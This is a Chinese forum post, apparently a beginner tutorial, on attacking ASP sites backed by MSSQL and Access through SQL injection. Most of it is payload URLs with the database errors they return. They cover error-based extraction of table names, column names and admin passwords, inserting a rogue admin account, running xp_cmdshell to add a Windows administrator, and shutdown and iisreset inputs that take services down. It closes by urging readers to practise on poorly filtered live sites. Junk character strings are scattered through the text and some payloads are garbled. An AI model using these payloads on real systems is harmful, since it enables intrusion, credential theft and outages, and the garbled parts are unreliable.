[安全]菜鸟SQL注入详解

踏浪行歌

菜鸟SQL注入详解 网上有很多高手GG们写的利用SQL注入如何去黑网站的，偶看了，嘿嘿。 " I" c2 m, i/ a! B9 Z9 \) m5 ~' K不过可能对于一些初学者而且，有点难。在这里，小林想把这个过时的 东东作一次全面的交待，尽量让没有编程基础的DDMM们很快的拿握这门技术。 * b$ q/ f& o3 |利用SQL进行添加，更改，查看记录。

当一台主机台开了80端口，当你手头没有任何黑客工具，那么，偶们有SQL。 ) A3 i. a' \" E他不需要你其他东东，只要一个浏览器就够了。HOHO，偶的文章菜菜，偶写这 6 {) z/ @- ~& ?9 E# }篇文章只是为了让一些对SQL很陌生的菜菜们看的，老鸟绕道。。。 - I) E5 L' r6 [% k

1，什么是SQL注入？ 2 \6 Q7 @5 {4 V! d9 p/ o* U

SQL注入，就是利用欺骗的方式，通过网页的查询功能，或查询命令注入。 当用户来到网站，会提交一些数据，再到数据库进行查询，确定此用户的身份。 举个简单的例子来说吧，你去一个站点的论坛，那么，你会输入你的用户名和 2 g1 w5 c1 M$ \% p3 e! t- z密码，点“确定”，网站会通过数据库的查询来判断你是不是他们的用户， 你的用户名和密码是否正确。而利用SQL注入，通过构造特殊的语句，来查找我 ( y, q- g; B& Z; ?5 s们所想要得到的信息，如管理员的帐号密码。以下，小林用了http://xxx.xxx.com : ?1 |! P' b7 |1 U4 ?来表示一个存在注入漏洞的网页。

- ], ~ A8 K0 [2 _! E* A5 B3 v2，助手篇， / Q, [( E- ]+ T( M Q先把IE菜单-工具-Internet选项-高级-显示友好HTTP错误信息前面的勾去掉。 ! H- J- Y' l9 G6 y2 b1 Z3 D1 M. {否则，不论服务器返回什么错误，我们都只能看到“HTTP500服务器错误”，不能获得更多的提示信息 L+ T% l: v* Y4 N2 [

。

3，哪些网页能利用？ / z1 ?6 h9 \2 n! j- p! o7 e! b我们去找一些要提交数据的网页，如：登陆页面，查找页面，添加页面等 找到后，如果你注意过网页的源代码，那么，你会发现，他上面一般有一个如下的表单： & l$ t9 x; v# s4 Q" m, }9 g9 P

<FORMaction=login.aspmethod=post> <input........ </FORM>

这些网页，后缀如asp,jsp,cgi，php网页。 如：http://xxx.xxx.com/index.asp?id=10 - x3 S7 x+ V; Q( J1 D' C7 Y上面这个例子，就是ASP页后，看到他的ID还的值了吗？是10。一般，我们找的就是这些页面 5 E, c3 Q6 V& `( E来练手了。（要做个好人噢。（^_^）像小林一样的好人。） / J) g6 y% P4 M$ K* D% W

4，怎么测试它是存在注入漏洞的呢？这一步偶称它为“踩点”。 小林有一个毛病，看什么网页，就要顺手在参数（如上面的10）上加一个小小的引号。 6 N6 t/ B2 \; `2 ?, Z" Jhttp://xxx.xxx.com/index.asp?id=10 % d- K, D" X% j9 j0 c& @0 c返回错误信息： ) A) Z6 F+ C) D5 L

MicrosoftOLEDBProviderforSQLServer错误80040e14

字符串之前有未闭合的引号。

/job/grxx.asp，行141 2 i- k; d( w) Q& K' G! o! r

这就是说，他用的是MsSQL数据库。这个引号，导致引号未闭合的错误。本身就是错的，因为 # F! O( s' C) \+ k# p- m: O通常一个整数是不用在SQL里加引号的。

如果他不是一个整数而是字母呢？

http://xxx.xxx.com/index.asp?user=lamb 8 `8 X: C* ^) N

那我们就把引号放到lamb中间，如lamb 呵呵，又出错了吧？ ; j1 X2 Z! Y% Q+ }

这说明，站点这一部分的代码是大有问题的（当然，就算他有源码公布在网上，我也懒得看）

当然，我们也可以提交： - i5 b: i; v5 J5 ~/ V3 Mhttp://xxx.xxx.com/index.asp?id=10;ANDcolumnaaa=5(注，这里的columnaaa是我乱写的) 出现错误信息： , p! C+ S' U4 o& ?0 k( ~

MicrosoftOLEDBProviderforODBCDrivers错误80040e14

[Microsoft][ODBCSQLServerDriver][SQLServer]Invalidcolumnnamecolumnaaa. , f& A7 C, _$ a* B0 m1 k

/job/grxx.asp，行27 这说明，这是一个SQL，里面没有columnaaa这个字段（我习惯说“列”）。 " E. i, M* ~4 t9 Z1 g! V/ W

利用出错的信息，我们现在多少了解了这个站点的服务了吧？

5，现在开工啦，偶不喜欢猜测他的字段名，太浪费TIME了，我们要想办法让数据查询中出错。 要产生一个错误让它自己报出数据库里的值。让我们用一用SQL语法GROUPBY或HAVING。如： # T9 s" i( k# _7 p4 v

http://xxx.xxx.com/job/grxx.asp?id=23%20HAVING%201=1--

出现错误信息： MicrosoftOLEDBProviderforODBCDrivers错误80040e14

[Microsoft][ODBCSQLServerDriver][SQLServer]Columnarticle.newsidisinvalidinthe

selectlistbecauseitisnotcontainedinanaggregatefunctionandthereisnoGROUPBY $ _8 |- {! ]4 A& t/ I* }: M" W: G4 s

clause.

/more.asp，行27 9 R. k) E- O& y2 L

看到article.newsid了吗？说明有一个叫article.newsid的列，因为你在用HAVING，所以你必须还要用

上GROUPBY，于是黑客就重复错误提交，直到没有得到错误。 ; ^: P6 Z( J" @7 n; _/ i这里要说明一下：分号在这里分离，%20是空格，--表示后面是一个注释，也就是说只是说明，不能去 n3 C5 S- N3 v& X

执行代码。(*_*) % h: T- g. U F1 U

下面是具体例子：

提交： http://xxx.xxx.com/job/grxx.asp?id=23%20HAVING%201=1-- 得到article.newsid这真是好东西。 ) Q1 S/ ]- i z# x6 J. |9 B提交： . V+ o0 m# Q, W9 h& ~http://xxx.xxx.com/job/grxx.asp?id=23%20group%20by%20article.newsid%20having%201=1-- 9 n# i8 Q7 F+ x- ^8 b2 }7 ?得到错误信息： , F; K% @) u/ o3 Z/ G5 z4 mMicrosoftOLEDBProviderforODBCDrivers(0x80040E14)

[Microsoft][ODBCSQLServerDriver][SQLServer]Columnarticle.titleisinvalidinthe . k: Z( v Z1 |7 q& l" B. o# _6 O0 f

selectlistbecauseitisnotcontainedineitheranaggregatefunctionortheGROUPBY / l8 Y( ~$ C4 e/ D6 z/ e

clause.

/more.asp，line20 & z% l& g! y8 A

得到： article.title 我们反复地一个一个加上来提交。 0 n8 L7 f2 U) g2 P5 l得到错误信息： MicrosoftOLEDBProviderforODBCDrivers(0x80040E14) 0 U) o9 I2 |/ F' O

[Microsoft][ODBCSQLServerDriver][SQLServer]Columnadm.userNameisinvalidinthe

selectlistbecauseitisnotcontainedineitheranaggregatefunctionortheGROUPBY 9 t0 d ]1 \: p9 |* @/ y7 T/ u8 l& k

clause.

/more.asp，line56 # E. Z2 S) [- x

这里要注意了，都到哪儿了？到下一个表了。 现在我们知道这里至少有2个表，他们的别名是：adm和article，如里面article对应的是：newsid等 5 }% c8 B# w N0 V9 o* [3 Y% s

title

利用系统表：

下面，我们要确定表名来加入数据。 系统表是MS-SQL2000的一部分，名叫sysObjectstable，我们将要用到查询UNIONSELECT,。 / {% y+ a% K# x' `+ A( {要从SysObjectstable有天地拿到表名，一般使用下面语句： & u, N( K& |( P. x! e/ k9 g$ SSELECTnameFROMsysObjectsWHERExtype=UU是指明定议USER的表。 ' K( T: n+ F7 d4 F8 E: s6 U1 L黑客们已经知道了表里的列， 现在他们能在下面加一些数字。甚至如下面的： / {2 a7 n% ~5 K* j$ O- B& f

在地址栏里打入： 4 ?- y8 H, e6 P9 k0 M: R

http://xxx.xxx.com/job/grxx.asp?id=23%20UNION%20ALL%20SELECT%; 201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype=U-- 记住，上面的，1-6数据中，6是我们想要的。不过有时候会出现数据类型错误，

http://xxx.xxx.com/job/grxx.asp?id=23%20SELECT;TOP1TABLE_NAMEFROM " ?7 B% L3 N' k1 ]: \. c

INFORMATION_SCHEMA.TABLES-- - _" K# o$ u8 f) @4 D

MSSQL服务将试图去转换一个string(nvarchar)到integer。那么就会出错： % [, g1 q# C6 Q7 B$ u. Z, w

MicrosoftOLEDBProviderforODBCDriverserror80040e07 0 I; G. t. o' x[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue

table1toacolumnofdatatypeint. /index.asp,line5 ; M' F+ A1 D* u) k% d

这个错误信息很“友好”地告诉我们string(nvarchar)值不能被转换成integer。 这样，我们就获得了数据表的第一个表名！这个表名就是tabel1。

5 e# e' p+ W3 t4 J" W% S1 h要获得第二个表名，我们继续，用以下查询： http://xxx.xxx.com/job/grxx.asp?id=23%20UNION;SELECTTOP1TABLE_NAMEFROM 0 |( g x! d" h8 F' |

INFORMATION_SCHEMA.TABLESWHERETABLE_NAMENOTIN(table1)--

也可以用关键字查找数据： http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1TABLE_NAMEFROM ' C* X0 j, Z6 w+ B+ E) H2 v! v

INFORMATION_SCHEMA.TABLESWHERETABLE_NAMELIKE%25ADMIN%25-- 现在错误信息： % C$ G6 U7 K& p% aMicrosoftOLEDBProviderforODBCDriverserror80040e07 [Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue , ?0 g" {* k4 H9 i6 t8 v) T

admin_logintoacolumnofdatatypeint. 7 g$ z1 v: P0 w' M" v/index.asp,line5

寻找与之匹配的值，%25ADMIN%25在SQL服务器上将被认作%ADMIN%。这样，我们就能获得符合标 1 B7 M3 ~. f$ T" U准的表名为"admin_login"的表了。 : D/ L3 e9 W0 k, j6 N

那么，如何获得表里所有的列表？ 3 V% W" p, k# @

我们能利用另一个有用的东东，INFORMATION_SCHEMA.COLUMNS出场！！！ + k/ K; ^& O- I" lhttp://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1COLUMN_NAMEFROM # v) { V2 O3 Z: R

INFORMATION_SCHEMA.COLUMNSWHERETABLE_NAME=admin_login--

现在错误信息： ! h1 r6 t% [) Q3 |; r2 R% Y5 nMicrosoftOLEDBProviderforODBCDriverserror80040e07 " R" f3 d7 M) g# e[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue

u_idtoacolumnofdatatypeint. 4 ], x0 X8 b/ ?6 N+ K4 _$ S3 X/index.asp,line6 , e! \! f k) n$ {" a9 o' E6 I+ ^看，我们有了第一个字段的名，我们用NOTIN()来获得下一个字段名： http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1COLUMN_NAMEFROM

INFORMATION_SCHEMA.COLUMNSWHERETABLE_NAME=admin_loginWHERECOLUMN_NAMENOTIN

(u_id)-- . Y# P# B- |) t4 D现在错误信息： MicrosoftOLEDBProviderforODBCDriverserror80040e07 - m* I+ H7 _- w- H8 n: r[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue # f' i/ |7 S( e, z. C) L

u_nametoacolumnofdatatypeint. /index.asp,line5 ! d# e% @( H$ ^. N1 ]- X* U我们继续，获得其他列表。如："password"等，因为我们获得下面错误信息： http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1COLUMN_NAMEFROM

INFORMATION_SCHEMA.COLUMNSWHERETABLE_NAME=admin_loginWHERECOLUMN_NAMENOTIN J9 r) O" P; e4 C5 Y' V7 f

(u_id,u_name,password,contents)-- 现在错误信息： MicrosoftOLEDBProviderforODBCDriverserror80040e14 [Microsoft][ODBCSQLServerDriver][SQLServer]ORDERBYitemsmustappearintheselect ! R0 @4 d" n2 f* q/ {% r' t

listifthestatementcontainsaUNIONoperator. /index.asp,line5 ! ?$ }0 h# s: x/ C6。2如何找到我们要找的重要数据呢？ 现在我们知道了表名，字段名，我们用相同的方法收集我们要的在数据库里的信息。 6 i7 s p2 q2 E+ W5 J E现在，我们从"admin_login"表里取得第一个u_name： 0 j9 o: G5 A& j, g) `$ \http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1u_nameFROMadmin_login-- 现在错误信息： , ]" G5 b. C: U5 }MicrosoftOLEDBProviderforODBCDriverserror80040e07 [Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue ) |3 g3 E& B& Z! o1 I6 H+ |

adminroottoacolumnofdatatypeint. . @( s1 x0 g( T1 X+ x: s; X! a/index.asp,line5

我们知道，这里有登陆的用户名叫"adminroot"的管理员。最后，从数据库里获得"adminroot"的密码 5 o2 X0 W2 R. l( m, ], l% P8 \

： 4 N9 e# ~# J: {" h, }% Vhttp://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1passwordFROMadmin_loginwhere

u_name=adminroot-- 5 ~* N6 i, @+ p) M6 p4 M2 c4 P现在错误信息： MicrosoftOLEDBProviderforODBCDriverserror80040e07 [Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue % }# g# k( `% U8 O& m V6 }3 S

roottoacolumnofdatatypeint. 5 ~9 b6 k- o* Z" r! b8 z7 F/index.asp,line5 - o: J6 j& U' ?( D3 O我们现在能用户名"adminroot"密码："root"登陆了。

如何取得数字的值？

以上技术描述有有一定的局限性。当我们试图转换文本组成有效的数字0-9我们不能得到任何错误。 ( W3 @/ ^# v- Q$ K6 p让我们说说如何获得"tony"的密码，密码是"19840217": * q- i4 i0 L9 `" Jhttp://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1passwordFROMadmin_loginwhere

u_name=tony-- 我们很可能发现，该页无法显示的错误。这结果表示，密码"19840217"被修改到一个数了。在整 合一个整型(10也是)，因为这是一个有效的整合。所以SQL服务就不会给出错误的提示了。 ; I. {4 X! G" \1 l# @我们就得不到数字的登陆了。 $ O8 l( W0 r' s7 f0 ^+ C( D) f要解决这个问题，我们能附加一些字母来测试转换失败。我们用以下的测试来代替： http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1convert(int, 6 }6 [8 ~" |% s2 E! C$ G

password%2b%20lambgirl)FROMadmin_loginwhereu_name=tony-- / K- N, C, C7 X N

我们简单地利用加号+设置密码数据文件的搜索路径。随便加一些。ASSCII码+=0x2b % ~3 T* K! M T4 q1 H4 e: w* D我们将添加空格在密码里。所以，如果把我们的密码是19840217。他将变成19840217lambgirl. 4 M7 X4 a9 W, A1 o. u/ L6 ?& [调出了转换了的函数。试着将19840217lambgirl转变成整型。SQL服务将出现ODBC错误： MicrosoftOLEDBProviderforODBCDriverserror80040e07 1 F3 c4 h4 q. i6 d; m3 N[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue . o6 d _* q+ q

19840217lambgirltoacolumnofdatatypeint. /index.asp,line5 现在，你就能用tony和密码：19840217lambgirl了。

( Y, ^/ q1 F" V如何在数据库修改，插入数据？ ' `2 H0 F2 R O, y8 u% W2 ~# N8 x+ {! b当我们成功地获得了表名，字段。就很容易在数据库里修改甚至插入新的数据。如更改"adminroot" * F& M' C: s; d* W6 F的密码，我们 s( f2 k) c* m0 N. n9 N

http://xxx.xxx.com/job/grxx.asp?id=23;UPDATEadmin_loginSETpassword=newpas5WHERE ) Q4 f# I. L1 n

u_name=adminroot--

要在数据表里插入新记录，

http://xxx.xxx.com/job/grxx.asp?id=23;INSERTINTOadmin_login(u_id,u_name,

password,contents)VALUES(123,xiaolin,pas,lambgirl)-- 现在，我们就能用xiaolinpas来登陆了。 ; b9 L/ |4 p( i* \

如何远程执行SQL漏洞？ ) T' u$ ^' [/ t

能进行SQL注入命令表明，我们能查任何我们想要查的。默认安装的的MSSQL服务 在系统中权限等于管理员。我们能利用执行存储过程像xp_cmdshell来执行远程破坏： 0 J* Q. P2 I; v' l. I;execmaster..xp_cmdshellping192.168.0.2--

(如果单引号不能用，就换成双引号) 8 e. z+ V! @ K6 N

分号表示结束前面的SQL查询，从而允许你开始另一个新的SQL命令。 / c Y( \& ]& m# c为了检验命令成功执行，你可以监听从192.168.0.2发出的的ICMP包。查看是否发出包。

#tcpdumpicmp % S5 j+ c4 K. @1 ^1 W如果你没有接到PING主机的回应，得到一个错误的提示，权限错误，那么，很可能管理员 限制了WEB用户对xp_cmdshell等的权限。

如何找出MYSQL查询结果？ 这很容易用sp_makewebtask来把你查询的结果放到一个HTML里： ;EXECmaster..sp_makewebtask"\\192.168.0.2\share\girlxiaolin.html","SELECT*FROM 7 a( P' J1 Y* O( R. P; ~4 p

INFORMATION_SCHEMA.TABLES" 但是目标IP必须共享文件夹。

7 \% M( o4 s7 [http://xxx.xxx.com/job/grxx.asp?id=23;;execmaster..xp_cmdshell“netusername password/add”-- . ~0 Y- V9 T3 e+ C" M1 p( R

xp_cmdshell用于调用系统命令，于是，用net命令新建了用户名为name、密码为password % ` H1 `7 i: v, s的windows的帐号，接着： http://xxx.xxx.com/job/grxx.asp?id=23;;execmaster..xp_cmdshell“netlocalgroupname

administrators/add”-- 将新建的帐号name加入管理员组，不过这种方法只于用sa连接数据库的情况，否则，没有权限调用 ' t$ Y/ T, G1 c" R: h6 P0 V

xp_cmdshell。

其他方面，如利用SQL的命令填写： , s$ j! X2 k4 u4 }' [; G! a( \将使SQL服务快速关闭 用户名:;shutdownwithnowait;-- 1 P" v- V: P* [4 k; j密码:不填 - k" [0 T7 f$ |) o

导致严重问题，网络故障。 1 s+ H L9 g6 }& o& T1 N用户名:;execmaster..xp_cmdshelliisreset;-- % N7 b- g w0 q6 _) ^; S9 x" g, w密码：不填

关于ACCESS部分， # I+ {5 b" P- u) E/ k" b( N* J* r

和ASSQL差不了多少，也是先在http://xxx.xxx.com/index.asp?id=10

出错的话，继续提交： 先测试是否有ADMIN表， http://xxx.xxx.com/index.asp?id=10and0<>(selectcount(*)fromadmin)

http://xxx.xxx.com/index.asp?id=10and1=(selectcount(*)fromadmin) 8 l2 I9 I! P0 q/ l6 _/ i5 F2 |没有的话，就换一个名字，如user啊，什么的。再猜里面是否有username这个字段. 5 Y+ X6 [6 k- q

and1=(selectcount(*)fromadminwherelen(username)>0) 如果出错，同理，我们也可以给它换一个名字。 接下来我们猜用户的具体名字。 and1=(selectcount(*)fromadminwhereleft(username,1)=l) 这时我们可以一个一个地来猜。 % H* n7 S9 q$ N' |and1=(selectcount(*)fromadminwhereleft(username,2)=la) 接下来猜密码，猜密码的道理同猜用户名一样。 and1=(selectcount(*)fromadminwhereleft(password,1)=l) - X" m8 z# ^0 R

好了，不写了，这篇文章小林写了好几天了，累死了，还是条理不清楚。 + y* N0 M0 y j; i5 k8 a: R8 f$ U文章还有很多不全面的地方。还有一些专业术语，小林可能也有误，不过小菜们拿来看看还 0 f5 y& i) [, f, g% [是行的啦。如果哪些写错了，请老鸟们加偶：165442496，告诉我错误，我会修正的。 我试过了，很多用MsSQL站点过滤不完整的网上也很多。所以大家可以找来练练手。 + I: j- j* ?( R- E, J- r

[em09]